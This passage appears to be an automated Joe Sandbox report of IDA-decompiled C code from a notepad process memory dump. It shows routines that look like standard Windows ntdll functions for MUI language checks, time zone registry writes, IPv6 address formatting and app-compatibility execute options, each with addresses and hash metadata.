						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00B1E2A8(_v12,  &_v68, _v16);
							if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00B2E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00B1E2A8(_t322,  &_v68, _t269);
							if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00B3718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00B1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00B12340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00B2E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00B1E2A8(_v12,  &_v68, _v16);
						if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00B2E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00B1E2A8(_t322,  &_v68, _t296);
						if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                    0x00b38788
                                                    0x00b38788
                                                    0x00b38791
                                                    0x00b38794
                                                    0x00b38798
                                                    0x00b3879b
                                                    0x00b3879e
                                                    0x00b387a1
                                                    0x00b387a4
                                                    0x00b387a7
                                                    0x00b387aa
                                                    0x00b387af
                                                    0x00b81ad3
                                                    0x00b38b0a
                                                    0x00b38b0d
                                                    0x00b38b13
                                                    0x00b38b19
                                                    0x00b38b1f
                                                    0x00b38b25
                                                    0x00b38b2b
                                                    0x00b38b31
                                                    0x00b38b37
                                                    0x00b38b3d
                                                    0x00b38b46
                                                    0x00b38b46
                                                    0x00b387c6
                                                    0x00b387d0
                                                    0x00b81ae0
                                                    0x00b81ae6
                                                    0x00b81af8
                                                    0x00b81af8
                                                    0x00b81afd
                                                    0x00b81afe
                                                    0x00b81b01
                                                    0x00b81b06
                                                    0x00b81b06
                                                    0x00b387d6
                                                    0x00b387f2
                                                    0x00b387f7
                                                    0x00b38807
                                                    0x00b3880a
                                                    0x00b3880f
                                                    0x00b38810
                                                    0x00b38813
                                                    0x00b38818
                                                    0x00b38818
                                                    0x00b3882c
                                                    0x00b38831
                                                    0x00b38838
                                                    0x00b38908
                                                    0x00b38920
                                                    0x00b389f0
                                                    0x00b38a08
                                                    0x00b38af6
                                                    0x00b38af6
                                                    0x00b38af8
                                                    0x00b38afb
                                                    0x00b81beb
                                                    0x00b81beb
                                                    0x00b38b04
                                                    0x00b81bf8
                                                    0x00b81c0e
                                                    0x00b81c13
                                                    0x00b81c16
                                                    0x00b81c16
                                                    0x00b81bf8
                                                    0x00000000
                                                    0x00b38b04
                                                    0x00b38a0e
                                                    0x00b38a11
                                                    0x00b38a14
                                                    0x00b38a15
                                                    0x00b38a18
                                                    0x00b38a22
                                                    0x00b38b59
                                                    0x00b38a28
                                                    0x00b38a3c
                                                    0x00b38a3c
                                                    0x00b38a42
                                                    0x00b81bb0
                                                    0x00b81b11
                                                    0x00b81b11
                                                    0x00000000
                                                    0x00b38a48
                                                    0x00b38a51
                                                    0x00b38a5b
                                                    0x00b38a5e
                                                    0x00b38a61
                                                    0x00b38a69
                                                    0x00b38a69
                                                    0x00b38a6d
                                                    0x00000000
                                                    0x00000000
                                                    0x00b38a74
                                                    0x00b38a7c
                                                    0x00b38a7d
                                                    0x00b38a91
                                                    0x00b38a93
                                                    0x00b38a93
                                                    0x00b38a98
                                                    0x00b38a9b
                                                    0x00b38aa1
                                                    0x00b38aa1
                                                    0x00b38aa4
                                                    0x00b38aaa
                                                    0x00b38ab1
                                                    0x00b38ac5
                                                    0x00b38ac7
                                                    0x00b38ac7
                                                    0x00b38ac5
                                                    0x00b38ace
                                                    0x00b81bc9
                                                    0x00b81bce
                                                    0x00b81bd2
                                                    0x00b81bd2
                                                    0x00b38ad8
                                                    0x00b38aeb
                                                    0x00b38aeb
                                                    0x00b38af0
                                                    0x00b38af4
                                                    0x00000000
                                                    0x00b38af4
                                                    0x00b38a42
                                                    0x00b38926
                                                    0x00b38929
                                                    0x00b3892c
                                                    0x00b3892d
                                                    0x00b38930
                                                    0x00b38935
                                                    0x00b3893a
                                                    0x00b38b51
                                                    0x00b38940
                                                    0x00b38954
                                                    0x00b38954
                                                    0x00b3895a
                                                    0x00b81b63
                                                    0x00000000
                                                    0x00b38960
                                                    0x00b38969
                                                    0x00b38973
                                                    0x00b38976
                                                    0x00b38979
                                                    0x00b3897e
                                                    0x00b38981
                                                    0x00b38981
                                                    0x00b38986
                                                    0x00000000
                                                    0x00000000
                                                    0x00b81b6e
                                                    0x00b81b74
                                                    0x00b81b7b
                                                    0x00b81b8f
                                                    0x00b81b91
                                                    0x00b81b91
                                                    0x00b81b99
                                                    0x00b81b9c
                                                    0x00b81ba2
                                                    0x00b81ba2
                                                    0x00b3898c
                                                    0x00b38992
                                                    0x00b38999
                                                    0x00b389ad
                                                    0x00b81ba8
                                                    0x00b81ba8
                                                    0x00b389ad
                                                    0x00b389b6
                                                    0x00b389c8
                                                    0x00b389cd
                                                    0x00b389d0
                                                    0x00b389d0
                                                    0x00b389d6
                                                    0x00b389e8
                                                    0x00b389e8
                                                    0x00b389ed
                                                    0x00000000
                                                    0x00b389ed
                                                    0x00b3895a
                                                    0x00b3883e
                                                    0x00b38841
                                                    0x00b38844
                                                    0x00b38845
                                                    0x00b38848
                                                    0x00b3884d
                                                    0x00b38852
                                                    0x00b38b49
                                                    0x00b38858
                                                    0x00b3886c
                                                    0x00b3886c
                                                    0x00b38872
                                                    0x00b81b0e
                                                    0x00000000
                                                    0x00b38878
                                                    0x00b38881
                                                    0x00b3888b
                                                    0x00b3888e
                                                    0x00b38891
                                                    0x00b38896
                                                    0x00b38899
                                                    0x00b38899
                                                    0x00b3889e
                                                    0x00000000
                                                    0x00000000
                                                    0x00b81b21
                                                    0x00b81b27
                                                    0x00b81b2e
                                                    0x00b81b42
                                                    0x00b81b44
                                                    0x00b81b44
                                                    0x00b81b4c
                                                    0x00b81b4f
                                                    0x00b81b55
                                                    0x00b81b55
                                                    0x00b388a4
                                                    0x00b388aa
                                                    0x00b388b1
                                                    0x00b388c5
                                                    0x00b81b5b
                                                    0x00b81b5b
                                                    0x00b388c5
                                                    0x00b388ce
                                                    0x00b388e0
                                                    0x00b388e5
                                                    0x00b388e8
                                                    0x00b388e8
                                                    0x00b388ee
                                                    0x00b38900
                                                    0x00b38900
                                                    0x00b38905
                                                    0x00000000
                                                    0x00b38905

                                                    APIs
                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00B387E6
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00B38914
                                                    • WindowsExcludedProcs, xrefs: 00B387C1
                                                    • Kernel-MUI-Language-SKU, xrefs: 00B389FC
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00B38827
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: 63bc8739c81c47b98b0615fe7d1a8dcf72c9e97477e1adb4615ff1448afc41ff
                                                    • Instruction ID: 62c5b3cc9f5e575c618c261969ecc462eca2256c22e8086eeecd1ecd8c9288da
                                                    • Opcode Fuzzy Hash: 63bc8739c81c47b98b0615fe7d1a8dcf72c9e97477e1adb4615ff1448afc41ff
                                                    • Instruction Fuzzy Hash: FFF1C8B2D00209EFCF11EF95C9859EEB7F8FB08300F6444AAF515A7211EB35AA45DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00BA822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E00BA822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00BC5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00BC5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00B67DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E00BA810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E00B0F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                                    0x00ba8231
                                                    0x00ba8235
                                                    0x00ba823a
                                                    0x00ba8245
                                                    0x00ba824b
                                                    0x00ba825c
                                                    0x00ba8262
                                                    0x00ba8263
                                                    0x00ba8266
                                                    0x00ba8268
                                                    0x00000000
                                                    0x00ba826a
                                                    0x00ba8270
                                                    0x00ba8275
                                                    0x00ba8277
                                                    0x00ba8295
                                                    0x00ba8297
                                                    0x00ba838d
                                                    0x00ba8391
                                                    0x00ba83a9
                                                    0x00ba83ab
                                                    0x00ba83ad
                                                    0x00ba83b6
                                                    0x00ba83b9
                                                    0x00000000
                                                    0x00ba83b9
                                                    0x00ba829d
                                                    0x00ba829d
                                                    0x00ba82b6
                                                    0x00ba82b8
                                                    0x00000000
                                                    0x00ba82be
                                                    0x00ba82c0
                                                    0x00ba82d5
                                                    0x00ba82d7
                                                    0x00000000
                                                    0x00ba82dd
                                                    0x00ba82f3
                                                    0x00ba82f5
                                                    0x00000000
                                                    0x00ba82fb
                                                    0x00ba8317
                                                    0x00ba8319
                                                    0x00000000
                                                    0x00ba831b
                                                    0x00ba8332
                                                    0x00ba8334
                                                    0x00000000
                                                    0x00ba8336
                                                    0x00ba834f
                                                    0x00ba8351
                                                    0x00000000
                                                    0x00ba8353
                                                    0x00ba8353
                                                    0x00ba835a
                                                    0x00000000
                                                    0x00ba835c
                                                    0x00ba8378
                                                    0x00ba837a
                                                    0x00ba837c
                                                    0x00ba8385
                                                    0x00ba8388
                                                    0x00ba83bc
                                                    0x00ba83cf
                                                    0x00ba83cf
                                                    0x00ba837c
                                                    0x00ba835a
                                                    0x00ba8351
                                                    0x00ba8334
                                                    0x00ba8319
                                                    0x00ba82f5
                                                    0x00ba82d7
                                                    0x00ba82b8
                                                    0x00ba83d4
                                                    0x00ba83d9
                                                    0x00ba83d9
                                                    0x00ba8277
                                                    0x00ba824d
                                                    0x00ba824d
                                                    0x00ba824d
                                                    0x00ba824d
                                                    0x00ba83df

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: _wcsnlen
                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                    • API String ID: 3628947076-1387797911
                                                    • Opcode ID: 0de0e9be4b5f7cc60e890aceac45711c5f770ff83d862cfe0c295191ab33f253
                                                    • Instruction ID: 55874c1c5116116f8e043f1bb647effb4dd46269a550cec67f8bf6567f335e33
                                                    • Opcode Fuzzy Hash: 0de0e9be4b5f7cc60e890aceac45711c5f770ff83d862cfe0c295191ab33f253
                                                    • Instruction Fuzzy Hash: 0041A875348309BEEB119A91CC42FDE7BECEF0AB44F1005A1BA04E5591DFB4DB5097A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B513CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E00B513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00B47707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xb12926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00B47707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xb19cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00B47707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00B47707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00B47707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00B47707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                    0x00b513d5
                                                    0x00b513d9
                                                    0x00b513dc
                                                    0x00b513de
                                                    0x00b513e1
                                                    0x00b513e8
                                                    0x00b513ee
                                                    0x00b7e8fd
                                                    0x00000000
                                                    0x00b7e921
                                                    0x00b7e921
                                                    0x00b7e928
                                                    0x00b7e982
                                                    0x00b7e98a
                                                    0x00000000
                                                    0x00b7e99a
                                                    0x00b7e99e
                                                    0x00b7e9a3
                                                    0x00b7e9a8
                                                    0x00b7e9b9
                                                    0x00b7e978
                                                    0x00000000
                                                    0x00b7e978
                                                    0x00b7e98a
                                                    0x00b7e92a
                                                    0x00b7e931
                                                    0x00b7e944
                                                    0x00b7e944
                                                    0x00b7e950
                                                    0x00b7e954
                                                    0x00b7e959
                                                    0x00b7e95e
                                                    0x00b7e963
                                                    0x00b7e970
                                                    0x00000000
                                                    0x00b7e975
                                                    0x00b7e93b
                                                    0x00b7e980
                                                    0x00000000
                                                    0x00b7e980
                                                    0x00b7e942
                                                    0x00b7e94b
                                                    0x00000000
                                                    0x00b7e94b
                                                    0x00000000
                                                    0x00b7e942
                                                    0x00b513f4
                                                    0x00b513f4
                                                    0x00b513f9
                                                    0x00b513fc
                                                    0x00b513ff
                                                    0x00b51406
                                                    0x00b7e9cc
                                                    0x00b7e9d2
                                                    0x00b7e9d2
                                                    0x00b7e9cc
                                                    0x00b5140c
                                                    0x00b51411
                                                    0x00b51431
                                                    0x00b5143a
                                                    0x00b5143c
                                                    0x00b5143f
                                                    0x00b5143f
                                                    0x00b51442
                                                    0x00b51447
                                                    0x00b514a8
                                                    0x00b514ac
                                                    0x00b7e9e2
                                                    0x00b7e9e7
                                                    0x00b7e9ec
                                                    0x00b7ea05
                                                    0x00b7ea05
                                                    0x00000000
                                                    0x00b51449
                                                    0x00000000
                                                    0x00b51449
                                                    0x00b5144c
                                                    0x00b51459
                                                    0x00b51462
                                                    0x00b51469
                                                    0x00b5146a
                                                    0x00b51470
                                                    0x00b51473
                                                    0x00b51476
                                                    0x00b51476
                                                    0x00b51490
                                                    0x00b51495
                                                    0x00b5138e
                                                    0x00b51390
                                                    0x00b51397
                                                    0x00b51398
                                                    0x00b51399
                                                    0x00b513a1
                                                    0x00b513a4
                                                    0x00b513a4
                                                    0x00b51498
                                                    0x00b5149c
                                                    0x00b5149f
                                                    0x00b514a2
                                                    0x00000000
                                                    0x00000000
                                                    0x00b514a4
                                                    0x00000000
                                                    0x00b514a4
                                                    0x00b51413
                                                    0x00b51415
                                                    0x00b51416
                                                    0x00b51419
                                                    0x00b5141c
                                                    0x00b51422
                                                    0x00b513b7
                                                    0x00b513bc
                                                    0x00b513bf
                                                    0x00b513bf
                                                    0x00b513c2
                                                    0x00b51424
                                                    0x00b51424
                                                    0x00b51424
                                                    0x00b51427
                                                    0x00b5142b
                                                    0x00b5142c
                                                    0x00b5142c
                                                    0x00b5142c
                                                    0x00000000
                                                    0x00b5141c
                                                    0x00b51411

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 1a09e784e51b807208a5ee27869067ee04dcb9ada84f726442acb4efaffaa76f
                                                    • Instruction ID: 07af88dc8740aa7f452d28aeb9a5e4b002eb2ae6d96f3d5b8bf670833775d610
                                                    • Opcode Fuzzy Hash: 1a09e784e51b807208a5ee27869067ee04dcb9ada84f726442acb4efaffaa76f
                                                    • Instruction Fuzzy Hash: EA618871900685AACB24CF5DC890ABFBBF5EF94301B54C8EDF9EA47640D334AA44DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B47EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00B47EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xbf2088; // 0x74b3f05d
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(L00B47F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					L00B63F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					L00B1DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xbf4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					L00B63F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00B20D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						L00B63F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00B28375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							L00B63F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00B8E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					L00B63F92();
					_t38 = 1;
					L2:
					return E00B1E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                    0x00b47f08
                                                    0x00b47f0f
                                                    0x00b47f12
                                                    0x00b47f1b
                                                    0x00b47f31
                                                    0x00b63ead
                                                    0x00b63eb4
                                                    0x00000000
